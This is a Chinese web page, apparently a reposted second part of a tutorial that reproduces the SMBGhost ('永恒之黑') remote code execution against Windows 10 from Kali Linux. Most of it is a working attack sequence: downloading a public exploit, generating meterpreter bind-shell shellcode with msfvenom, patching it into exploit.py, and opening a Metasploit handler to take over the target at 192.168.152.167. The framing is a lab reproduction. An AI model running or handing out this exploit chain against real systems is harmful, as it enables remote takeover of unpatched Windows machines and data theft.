江苏龙网

  1. 首页 > 人文 > >

游龙战神|Windows10永恒之黑复现( 二 )


Kali Linux实操进行反弹shell
root用户登录(默认不能登录,需要给root设置密码后才能登录):
普通用户登录后 , sudo passwd root 给root设置密码 , 成功后重启kali , 便能使用root登录!
游龙战神|Windows10永恒之黑复现
1. 下载PoC , SMBGhost_RCE_PoC-master.zip
解压后 , 进入目录:
游龙战神|Windows10永恒之黑复现
2. 用msfvenom生成python类型(-f python)的shellcode
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
游龙战神|Windows10永恒之黑复现
游龙战神|Windows10永恒之黑复现
把生成的buf += b“......”中的值copy下来 , 打开exploit.py文件 , 替换USER_PAYLOAD的值:
游龙战神|Windows10永恒之黑复现
替换为:
游龙战神|Windows10永恒之黑复现
替换技巧:
生成的数据连同buf+=都copy下来 , 然后粘贴USER_PAYLOAD= ...... , 最后使用查找和替换把buf替换为USER_PAYLOAD!
游龙战神|Windows10永恒之黑复现
强调: 修改一定要仔细和精确 , 然后保存退出 , 不然你会怀疑人生!
3. 启动msf控制端设置有效载荷并开启4444端口监听
msfconsole
游龙战神|Windows10永恒之黑复现
(1) use exploit/multi/handler
(2) set payload windows/x64/meterpreter/bind_tcp
(3) set lport 4444
(4) set rhost 192.168.152.167 (Win10的IP地址)
(5) run
游龙战神|Windows10永恒之黑复现
4. python3执行exploit.py脚本
新终端打开执行:
python3 exploit.py -ip 192.168.152.167
游龙战神|Windows10永恒之黑复现
游龙战神|Windows10永恒之黑复现
出现图中提示 , 按任意键执行shellcode!
游龙战神|Windows10永恒之黑复现
查看msfconsole终端:
提示有session 1 opened
注意:如果没有session 1 opened提示 , 可以退出监听(ctrl+c)重新run一下再次监听 , 直到成功为止!


推荐阅读


上一篇:忘川彼岸|如果你只知道 go test 用于单元测试就太 LOW 了

下一篇:清澈如初|即将开始装biu 模式